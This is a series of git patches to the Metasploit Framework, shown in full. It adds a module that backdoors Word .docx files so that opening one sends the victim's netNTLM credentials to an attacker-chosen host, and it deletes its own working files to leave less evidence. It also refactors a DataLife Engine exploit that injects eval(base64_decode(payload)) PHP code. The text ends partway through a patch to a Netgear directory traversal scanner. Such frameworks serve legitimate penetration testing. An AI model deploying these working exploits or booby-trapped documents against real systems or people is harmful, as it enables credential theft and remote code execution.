w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Bibliography" w:uiPriority="37"/><w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/></w:latentStyles><w:style w:type="paragraph" w:default="1" w:styleId="Normal"><w:name w:val="Normal"/><w:qFormat/><w:rsid w:val="00B25E88"/><w:rPr><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:style><w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont"><w:name w:val="Default Paragraph Font"/><w:uiPriority w:val="99"/><w:semiHidden/></w:style><w:style w:type="table" w:default="1" w:styleId="TableNormal"><w:name w:val="Normal Table"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/><w:qFormat/><w:tblPr><w:tblInd w:w="0" w:type="dxa"/><w:tblCellMar><w:top w:w="0" w:type="dxa"/><w:left w:w="108" w:type="dxa"/><w:bottom w:w="0" w:type="dxa"/><w:right w:w="108" w:type="dxa"/></w:tblCellMar></w:tblPr></w:style><w:style w:type="numbering" w:default="1" w:styleId="NoList"><w:name w:val="No List"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/></w:style></w:styles> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml b/modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml new file mode 100644 index 000000000000..a06c80529b6c --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme"><a:themeElements><a:clrScheme name="Office"><a:dk1><a:sysClr val="windowText" lastClr="000000"/></a:dk1><a:lt1><a:sysClr val="window" lastClr="FFFFFF"/></a:lt1><a:dk2><a:srgbClr val="1F497D"/></a:dk2><a:lt2><a:srgbClr val="EEECE1"/></a:lt2><a:accent1><a:srgbClr val="4F81BD"/></a:accent1><a:accent2><a:srgbClr val="C0504D"/></a:accent2><a:accent3><a:srgbClr val="9BBB59"/></a:accent3><a:accent4><a:srgbClr val="8064A2"/></a:accent4><a:accent5><a:srgbClr val="4BACC6"/></a:accent5><a:accent6><a:srgbClr val="F79646"/></a:accent6><a:hlink><a:srgbClr val="0000FF"/></a:hlink><a:folHlink><a:srgbClr val="800080"/></a:folHlink></a:clrScheme><a:fontScheme name="Office"><a:majorFont><a:latin typeface="Cambria"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="MS ゴシック"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Times New Roman"/><a:font script="Hebr" typeface="Times New Roman"/><a:font script="Thai" typeface="Angsana New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="MoolBoran"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Times New Roman"/><a:font script="Uigh" typeface="Microsoft Uighur"/></a:majorFont><a:minorFont><a:latin typeface="Calibri"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="MS 明朝"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Arial"/><a:font script="Hebr" typeface="Arial"/><a:font script="Thai" typeface="Cordia New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="DaunPenh"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Arial"/><a:font script="Uigh" typeface="Microsoft Uighur"/></a:minorFont></a:fontScheme><a:fmtScheme name="Office"><a:fillStyleLst><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="50000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="35000"><a:schemeClr val="phClr"><a:tint val="37000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:tint val="15000"/><a:satMod val="350000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="1"/></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:shade val="51000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="80000"><a:schemeClr val="phClr"><a:shade val="93000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="94000"/><a:satMod val="135000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="0"/></a:gradFill></a:fillStyleLst><a:lnStyleLst><a:ln w="9525" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"><a:shade val="95000"/><a:satMod val="105000"/></a:schemeClr></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="25400" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="38100" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln></a:lnStyleLst><a:effectStyleLst><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="38000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst><a:scene3d><a:camera prst="orthographicFront"><a:rot lat="0" lon="0" rev="0"/></a:camera><a:lightRig rig="threePt" dir="t"><a:rot lat="0" lon="0" rev="1200000"/></a:lightRig></a:scene3d><a:sp3d><a:bevelT w="63500" h="25400"/></a:sp3d></a:effectStyle></a:effectStyleLst><a:bgFillStyleLst><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="40000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="40000"><a:schemeClr val="phClr"><a:tint val="45000"/><a:shade val="99000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="20000"/><a:satMod val="255000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="-80000" r="50000" b="180000"/></a:path></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="80000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="30000"/><a:satMod val="200000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="50000" r="50000" b="50000"/></a:path></a:gradFill></a:bgFillStyleLst></a:fmtScheme></a:themeElements><a:objectDefaults/><a:extraClrSchemeLst/></a:theme> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/webSettings.xml b/modules/auxiliary/docx/sourcedoc/word/webSettings.xml new file mode 100644 index 000000000000..b4a16977f713 --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/word/webSettings.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:optimizeForBrowser/></w:webSettings> \ No newline at end of file diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb new file mode 100644 index 000000000000..95410ef7cf4d --- /dev/null +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -0,0 +1,320 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://Metasploit.com/projects/Framework/ +## + +require 'msf/core' +require 'zip/zip' + +class Metasploit3 < Msf::Auxiliary + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Word UNC Path Injector', + 'Description' => %q{ + This module modifies a .docx file that will, upon opening, submit all + stored netNTLM credentials to a remote host. It can also create an empty docx file. + If emailed the receiver needs to put the document in editing mode + before the remote server will be contacted. Preview and read-only + mode do not work. Verified to work with Microsoft Word 2003, + 2007 and 2010 as of Januari 2013 date by using auxiliary/server/capture/smb + }, + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 1 $', + 'References' => + [ + [ 'URL', 'http://jedicorp.com/?p=534' ], + ], + 'Author' => + [ + 'SphaZ <cyberphaz[at]gmail.com>' + ] + )) + + register_options( + [ + OptAddress.new('LHOST',[true, 'Server IP or hostname that the .docx document points to','']), + OptString.new('SRCFILE', [false, '.docx file to backdoor. If left empty, creates an emtpy document', '']), + OptString.new('SKLFILENAME', [false,'Document output filename', 'stealnetNTLM.docx']), + OptPath.new('SKLOUTPUTPATH', [false, 'The location where the backdoored empty .docx file will be written','./']), + OptString.new('SKLDOCAUTHOR',[false,'Document author for skeleton document', 'SphaZ']), + ], self.class) + end + + + #here we create an empty .docx file with the UNC path. Only done when SRCFILE is empty + def makeNewFile + metadataFileData = "" + metadataFileData << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><cp:coreProperties" + metadataFileData << " xmlns:cp=\"http://schemas.openxmlformats.org/package/2006/metadata/core-properties\" " + metadataFileData << "xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" " + metadataFileData << "xmlns:dcmitype=\"http://purl.org/dc/dcmitype/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">" + metadataFileData << "<dc:creator>#{datastore['SKLDOCAUTHOR']}</dc:creator><cp:lastModifiedBy>#{datastore['SKLDOCAUTHOR']}" + metadataFileData << "</cp:lastModifiedBy><cp:revision>1</cp:revision><dcterms:created xsi:type=\"dcterms:W3CDTF\">" + metadataFileData << "2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">" + metadataFileData << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>" + + #Lets get the local filepath to figure out where we need to write the metadata file + metadataFileName = File.dirname(self.file_path)+'/sourcedoc/docProps/core.xml' + begin + if File.exists?(metadataFileName) + vprint_status("Deleting metadatafile") + File.delete(metadataFileName) + end + fd = File.open( metadataFileName, 'wb+' ) + fd.puts(metadataFileData) + fd.close + rescue + print_error("Cant write to #{metadataFileName} make sure module and data are intact") + return nil + end + + #now lets write the _rels file that contains the UNC path + refdataFileName = File.dirname(self.file_path) + '/sourcedoc/word/_rels/settings.xml.rels' + begin + fd = File.open( refdataFileName, 'wb+' ) + fd.puts(@relsFileData) + fd.close + rescue + print_error("Cant write to #{refdataFileName} make sure module and data are intact.") + return nil + end + + #and finally, lets creat the .docx file + inputPath = File.dirname(self.file_path) + '/sourcedoc/' + inputPath.sub!(%r[/S],'') + + archive = File.join(datastore['SKLOUTPUTPATH'], datastore['SKLFILENAME']) + #if file exists, lets not overwrite + if File.exists?(archive) + print_error("Output file #{archive} already exists! Set a different name for SKLOUTPUTPATH and/or SKLFILENAME.") + return nil + end + + if zipDocx(inputPath, archive, false).nil? + return nil + end + + begin + #delete the created xml files, the less evidence of parameters used the better + File.delete(File.dirname(self.file_path)+'/sourcedoc/docProps/core.xml') + File.delete(File.dirname(self.file_path) + '/sourcedoc/word/_rels/settings.xml.rels') + rescue + print_error("Error deleting local core and settings documents. Generating new file worked though") + end + return 0 + end + + + #this bit checks the settings.xml and looks for the relations file entry we need for our evil masterplan. + #and then inserts the UNC path into the _rels file. + def manipulateFile + ref = "<w:attachedTemplate r:id=\"rId1\"/>" + + if File.exists?(datastore['SRCFILE']) + if File.stat(datastore['SRCFILE']).readable? and File.stat(datastore['SRCFILE']).writable? + vprint_status("We can read and write the file, this is probably a good thing :P") + else + print_error("Not enough rights to modify the file. Aborting.") + return nil + end + + fileContent = getFileFromDocx("word/settings.xml") + if fileContent.nil? + return nil + end + + if not fileContent.index("w:attachedTemplate r:id=\"rId1\"").nil? + vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)") + #and we put just our rels file into the docx + if unzipDocx.nil? + return nil + end + if updateDocxFile("word/_rels/settings.xml.rels", @relsFileData).nil? + return nil + end + #ok we got through this, lets zip the file, overwriting the original in this case + begin + File.delete(datastore['SRCFILE']) + if zipDocx(@tmpDir, datastore['SRCFILE'],true).nil? + return nil + end + rescue + print_error("Can't modify the original document :(") + return nil + end + else + #now insert the reference to the file that will enable our malicious entry + insertOne = fileContent.index("<w:defaultTabStop") + + if insertOne.nil? + insertTwo = fileContent.index("<w:hyphenationZone") # 2nd choice + if not insertTwo.nil? + vprint_status("HypenationZone found, we use this for insertion.") + fileContent.insert(insertTwo, ref ) + end + else + vprint_status("DefaultTabStop found, we use this for insertion.") + fileContent.insert(insertOne, ref ) + end + + if insertOne.nil? && insertTwo.nil? + vprint_error("Cannot find insert point for reference into settings.xml") + return nil + end + + if unzipDocx.nil? + return nil + end + #update the settings files + if updateDocxFile("word/settings.xml",fileContent).nil? + print_error("Error inserting data into word/settings.xml") + return nil + end + if updateDocxFile("word/_rels/settings.xml.rels", @relsFileData).nil? + print_error("Eror inserting data into word/_rels/settings.xml.rels") + return nil + end + #ok we got through this, lets zip the file, overwriting the original in this case + begin + File.delete(datastore['SRCFILE']) + if zipDocx(@tmpDir, datastore['SRCFILE'],true).nil? + return nil + end + rescue + print_error("Can't modify the original document :(") + return nil + end + + end + else + print_error("File #{datastore['SRCFILE']} does not exist. Aborting.") + return nil + end + + return 0 + end + + #read a file from .docx into a string + def getFileFromDocx(fileString) + begin + Zip::ZipFile.open(datastore['SRCFILE']) do |fileZip| + fileZip.each do |f| + next unless f.to_s == fileString + return f.get_input_stream.read + end + end + fileZip.close + print_error("Cant find #{fileString} inside the .docx") + return nil + rescue + print_error("Unknown error reading docx file.") + fileZip.close + return nil + end + fileZip.close + end + + def zipDocx(inputPath, archive, delsource) + begin + #add the prepared files to the zip file + Zip::ZipFile.open(archive, 'wb') do |fileZip| + Dir["#{inputPath}/**/**"].reject{|f|f==archive}.each do |file| + fileZip.add(file.sub(inputPath+'/',''), file) + end + relsFile = inputPath + '/_rels/.rels' + fileZip.add(relsFile.sub(inputPath+'/',''), relsFile) + end + rescue + print_error("Error zipping file..") + begin + FileUtils.rm_rf(inputPath) + rescue + print_error("Cant even clean up my own mess, I give up") + return nil + end + return nil + end + #do we delete the source? + if delsource + begin + FileUtils.rm_rf(inputPath) + rescue + print_error("Cant even clean up my own mess, I give up") + end + end + return 0 + end + + def unzipDocx + begin + vprint_status("tmpdir: #{@tmpDir}") + if not File.directory?(@tmpDir) + vprint_status("Damn rubyzip cant be relied upon, so we do it the hard way. Extracting #{datastore['SRCFILE']}") + Zip::ZipFile.open(datastore['SRCFILE']) do |fileZip| + fileZip.each do |entry| + if not entry.nil? + vprint_status("extracting entry: #{entry.name}") + end + fpath = File.join(@tmpDir, entry.name) + FileUtils.mkdir_p(File.dirname(fpath)) + fileZip.extract(entry, fpath) + end + end + end + rescue + print_error("There was an error unzipping") + return nil + end + return 0 + end + + #used for updating the files inside the docx from a string + def updateDocxFile(fileString, content) + begin + #ok so now we unpacked the docx file, lets start to update the file we need to do + #does the file already exist? + archive = File.join(@tmpDir, fileString) + vprint_status("We need to look for: #{archive}") + if File.exists?(archive) + vprint_status("Deleting original file #{archive}") + File.delete(archive) + end + #now lets put OUR file there + File.open(archive, 'wb+') { |f| f.write(content) } + rescue Exception => ex + print_error("Well, extracting and manipulating the file went wrong :(") + return nil + end + return 0 + end + + def run + #we need this in in bot makeNewFile and manipulateFile + @relsFileData = "" + @relsFileData << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>".chomp + @relsFileData << "<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\">".chomp + @relsFileData << "<Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/".chomp + @relsFileData << "attachedTemplate\" Target=\"file://\\\\#{datastore['LHOST']}\\normal.dot\" TargetMode=\"External\"/></Relationships>" + #where do we unpack our file? + @tmpDir = "#{Dir.tmpdir}/#{Time.now.to_i}#{rand(1000)}/" + + if "#{datastore['SRCFILE']}" == "" + #make an empty file + print_status("Creating empty document") + if not makeNewFile.nil? + print_good("Success! Document #{datastore['SKLFILENAME']} created in #{datastore['SKLOUTPUTPATH']}") + end + else + #extract the word/settings.xml and edit in the reference we need + print_status("Injecting UNC path into existing document.") + if not manipulateFile.nil? + print_good("Success! Document #{datastore['SRCFILE']} now references to #{datastore['LHOST']}") + else + print_error("Something went wrong!") + end + end + end +end From bf7bb9952e5ef3c41cbfdbc6dbe8de1b3301c04b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 1 Feb 2013 11:53:42 +0100 Subject: [PATCH 218/421] added template stuff improve --- .../unix/webapp/datalife_preview_exec.rb | 34 ++++++++++--------- 1 file changed, 18 insertions(+), 16 deletions(-) diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb index e1339f1313cb..7497dd6f9bfa 100644 --- a/modules/exploits/unix/webapp/datalife_preview_exec.rb +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb @@ -18,8 +18,10 @@ def initialize(info = {}) 'Description' => %q{ This module exploits a PHP code injection vulnerability DataLife Engine 9.7. The vulnerability exists in preview.php, due to an insecure usage of preg_replace() - with the e modifier, which allows to inject arbitrary php code, when the template - in use contains a [catlist] or [not-catlist] tag. + with the e modifier, which allows to inject arbitrary php code, when there is a + template installed which contains a [catlist] or [not-catlist] tag, even when the + template isn't in use currently. The template can be configured with the TEMPLATE + datastore option. }, 'Author' => [ @@ -49,7 +51,8 @@ def initialize(info = {}) register_options( [ - OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]) + OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]), + OptString.new('TEMPLATE', [ true, "Template with catlist or not-catlit tag", "Default"]) ], self.class) end @@ -57,17 +60,24 @@ def uri normalize_uri(target_uri.path, 'engine', 'preview.php') end - def check - fingerprint = rand_text_alpha(4+rand(4)) + def send_injection(inj) res = send_request_cgi( { 'uri' => uri, 'method' => 'POST', 'vars_post' => { - 'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//" - } + 'catlist[0]' => inj + }, + 'cookie' => "dle_skin=#{datastore['TEMPLATE']}" }) + res + end + + def check + fingerprint = rand_text_alpha(4+rand(4)) + + res = send_injection("#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//") if res and res.code == 200 and res.body =~ /#{fingerprint}/ return Exploit::CheckCode::Vulnerable @@ -80,14 +90,6 @@ def exploit @peer = "#{rhost}:#{rport}" print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code") - res = send_request_cgi( - { - 'uri' => uri, - 'method' => 'POST', - 'vars_post' => - { - 'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//" - } - }) + res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//") end end From 0e22ee73b557197011c931061ee44240c1c1a6a1 Mon Sep 17 00:00:00 2001 From: m-1-k-3 <michael.messner@integralis.com> Date: Fri, 1 Feb 2013 19:26:34 +0100 Subject: [PATCH 219/421] updates ... --- .../admin/http/netgear_sph200d_traversal.rb | 126 +++++++++--------- 1 file changed, 63 insertions(+), 63 deletions(-) diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index dde540899607..d9a0a23fd809 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id: tomcat_utf8_traversal.rb 14975 2012-03-18 01:39:05Z rapid7 $ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -14,13 +10,11 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::WmapScanServer include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Netgear SPH200D - Directory Traversal Vulnerability', - 'Version' => '$$', 'Description' => %q{ This module exploits a directory traversal vulnerablity which is present in Netgear SPH200D Skype telephone @@ -35,45 +29,58 @@ def initialize 'Author' => [ 'm-1-k-3' ], 'License' => MSF_LICENSE ) - register_options( [ Opt::RPORT(80), - 